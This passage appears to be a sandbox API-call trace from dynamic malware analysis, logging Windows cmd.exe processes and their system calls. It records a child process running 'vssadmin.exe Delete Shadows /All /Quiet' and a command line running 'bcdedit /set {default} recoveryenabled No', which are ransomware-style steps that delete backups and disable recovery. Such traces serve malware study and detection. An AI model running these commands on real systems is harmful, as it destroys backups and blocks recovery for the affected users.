GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.974] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.974] GetProcessHeap () returned 0x2a0000 [0202.974] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x104) returned 0x2b5c50 [0202.975] GetProcessHeap () returned 0x2a0000 [0202.975] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1f8) returned 0x2b8bb0 [0202.976] GetProcessHeap () returned 0x2a0000 [0202.976] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b8bb0, Size=0x106) returned 0x2b8bb0 [0202.976] GetProcessHeap () returned 0x2a0000 [0202.976] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b8bb0) returned 0x106 [0202.976] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.976] GetProcessHeap () returned 0x2a0000 [0202.976] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xe8) returned 0x2b8cd0 [0202.976] GetProcessHeap () returned 0x2a0000 [0202.976] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b8cd0, Size=0x7e) returned 0x2b8cd0 [0202.976] GetProcessHeap () returned 0x2a0000 [0202.976] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b8cd0) returned 0x7e [0202.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1ef0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0c0) returned 0x2b5d60 [0202.977] GetProcessHeap () returned 0x2a0000 [0202.977] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b4700, Size=0x8) returned 0x2b89e0 [0202.977] FindClose (in: hFindFile=0x2b5d60 | out: hFindFile=0x2b5d60) returned 1 [0202.977] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0202.977] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0202.977] GetProcessHeap () returned 0x2a0000 [0202.977] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x28) returned 0x2b4700 [0202.977] GetProcessHeap () returned 0x2a0000 [0202.977] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x218) returned 0x2b8d60 [0202.977] GetProcessHeap () returned 0x2a0000 [0202.977] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x62) returned 0x2b9f80 [0202.977] GetProcessHeap () returned 0x2a0000 [0202.977] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x420) returned 0x2b8f80 [0202.978] SetErrorMode (uMode=0x0) returned 0x1 [0202.978] SetErrorMode (uMode=0x1) returned 0x0 [0202.978] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b8f90, lpFilePart=0x1ef0e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef0e0*="system32") returned 0x13 [0202.978] SetErrorMode (uMode=0x1) returned 0x1 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b8f80, Size=0x52) returned 0x2b8f80 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b8f80) returned 0x52 [0202.978] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.978] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x104) returned 0x2b8ff0 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1f8) returned 0x2b9100 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b9100, Size=0x106) returned 0x2b9100 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b9100) returned 0x106 [0202.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xe8) returned 0x2b9220 [0202.978] GetProcessHeap () returned 0x2a0000 [0202.978] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b9220, Size=0x7e) returned 0x2b9220 [0202.979] GetProcessHeap () returned 0x2a0000 [0202.979] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b9220) returned 0x7e [0202.979] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee50) returned 0x2b5d60 [0202.979] FindClose (in: hFindFile=0x2b5d60 | out: hFindFile=0x2b5d60) returned 1 [0202.979] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0202.979] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0202.979] GetConsoleTitleW (in: lpConsoleTitle=0x1ef3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.979] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef118 | out: lpAttributeList=0x1ef158, lpSize=0x1ef118) returned 1 [0202.979] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef158, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef108, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef158, lpPreviousValue=0x0) returned 1 [0202.979] GetStartupInfoW (in: lpStartupInfo=0x1ef270 | out: lpStartupInfo=0x1ef270*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.980] GetProcessHeap () returned 0x2a0000 [0202.980] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x20) returned 0x2c4c30 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.980] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.981] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.981] GetProcessHeap () returned 0x2a0000 [0202.982] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c4c30 | out: hHeap=0x2a0000) returned 1 [0202.982] GetProcessHeap () returned 0x2a0000 [0202.982] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2b5d60 [0202.982] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.982] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef190*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="vssadmin.exe Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef140 | out: lpCommandLine="vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x1ef140*(hProcess=0x58, hThread=0x54, dwProcessId=0x330, dwThreadId=0x350)) returned 1 [0202.996] CloseHandle (hObject=0x54) returned 1 [0202.996] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.996] GetProcessHeap () returned 0x2a0000 [0202.996] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c0110 | out: hHeap=0x2a0000) returned 1 [0202.996] GetEnvironmentStringsW () returned 0x2c0110* [0202.996] GetProcessHeap () returned 0x2a0000 [0202.996] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xac4) returned 0x2c7630 [0202.996] FreeEnvironmentStringsW (penv=0x2c0110) returned 1 [0202.996] GetProcessHeap () returned 0x2a0000 [0202.996] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b5d60 | out: hHeap=0x2a0000) returned 1 [0202.996] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef158 | out: lpAttributeList=0x1ef158) [0202.996] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0202.997] _close (_FileHandle=4) returned 0 [0202.997] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0203.490] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x1ef678 | out: lpExitCode=0x1ef678*=0x0) returned 1 [0203.490] CloseHandle (hObject=0x60) returned 1 [0203.490] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0232.804] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x1ef678 | out: lpExitCode=0x1ef678*=0x0) returned 1 [0232.804] CloseHandle (hObject=0x58) returned 1 [0232.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.804] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.805] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0232.805] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.805] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0232.805] SetConsoleInputExeNameW () returned 0x1 [0232.805] GetConsoleOutputCP () returned 0x1b5 [0232.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0232.806] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0232.806] exit (_Code=0) Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4258e000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 6532368|bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 156 os_tid = 0x5c0 [0202.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fc30 | out: lpSystemTimeAsFileTime=0x20fc30*(dwLowDateTime=0x1d577640, dwHighDateTime=0x1d661be)) [0202.786] GetCurrentProcessId () returned 0x5d8 [0202.786] GetCurrentThreadId () returned 0x5c0 [0202.786] GetTickCount () returned 0x113e63a [0202.786] QueryPerformanceCounter (in: lpPerformanceCount=0x20fc38 | out: lpPerformanceCount=0x20fc38*=13328220935) returned 1 [0202.790] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0202.790] __set_app_type (_Type=0x1) [0202.790] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0202.790] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0202.790] GetCurrentThreadId () returned 0x5c0 [0202.790] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5c0) returned 0x3c [0202.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.791] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0202.791] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.791] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.791] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fbc8 | out: phkResult=0x20fbc8*=0x0) returned 0x2 [0202.792] VirtualQuery (in: lpAddress=0x20fbb0, lpBuffer=0x20fb30, dwLength=0x30 | out: lpBuffer=0x20fb30*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.792] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb30, dwLength=0x30 | out: lpBuffer=0x20fb30*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.792] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb30, dwLength=0x30 | out: lpBuffer=0x20fb30*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.792] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20fb30, dwLength=0x30 | out: lpBuffer=0x20fb30*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.792] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb30, dwLength=0x30 | out: lpBuffer=0x20fb30*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0202.792] GetConsoleOutputCP () returned 0x1b5 [0202.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.792] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0202.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.793] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.793] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0202.794] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.794] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.794] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.794] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0202.794] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.794] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.795] GetEnvironmentStringsW () returned 0x298b40* [0202.795] GetProcessHeap () returned 0x280000 [0202.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x2995d0 [0202.795] FreeEnvironmentStringsW (penv=0x298b40) returned 1 [0202.795] GetProcessHeap () returned 0x280000 [0202.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8) returned 0x2989c0 [0202.795] GetEnvironmentStringsW () returned 0x298b40* [0202.795] GetProcessHeap () returned 0x280000 [0202.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x29a060 [0202.795] FreeEnvironmentStringsW (penv=0x298b40) returned 1 [0202.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea88 | out: phkResult=0x20ea88*=0x44) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x18, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x1, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x1, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x0, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x40, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x40, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x40, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.796] RegCloseKey (hKey=0x44) returned 0x0 [0202.796] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea88 | out: phkResult=0x20ea88*=0x44) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x40, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x1, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x1, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x0, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x9, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.796] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x4, lpData=0x20eaa0*=0x9, lpcbData=0x20ea84*=0x4) returned 0x0 [0202.797] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea80, lpData=0x20eaa0, lpcbData=0x20ea84*=0x1000 | out: lpType=0x20ea80*=0x0, lpData=0x20eaa0*=0x9, lpcbData=0x20ea84*=0x1000) returned 0x2 [0202.797] RegCloseKey (hKey=0x44) returned 0x0 [0202.797] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a5 [0202.797] srand (_Seed=0x5f1ae1a5) [0202.797] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6532368|bcdedit /set {default} recoveryenabled No" [0202.797] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6532368|bcdedit /set {default} recoveryenabled No" [0202.797] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.797] GetProcessHeap () returned 0x280000 [0202.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29aaf0 [0202.797] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29ab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.798] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.798] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.798] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.798] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.798] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.798] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.798] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.798] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.798] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.798] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.798] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.798] GetProcessHeap () returned 0x280000 [0202.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2995d0 | out: hHeap=0x280000) returned 1 [0202.798] GetEnvironmentStringsW () returned 0x298b40* [0202.798] GetProcessHeap () returned 0x280000 [0202.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa94) returned 0x29ad10 [0202.798] FreeEnvironmentStringsW (penv=0x298b40) returned 1 [0202.798] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.798] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | 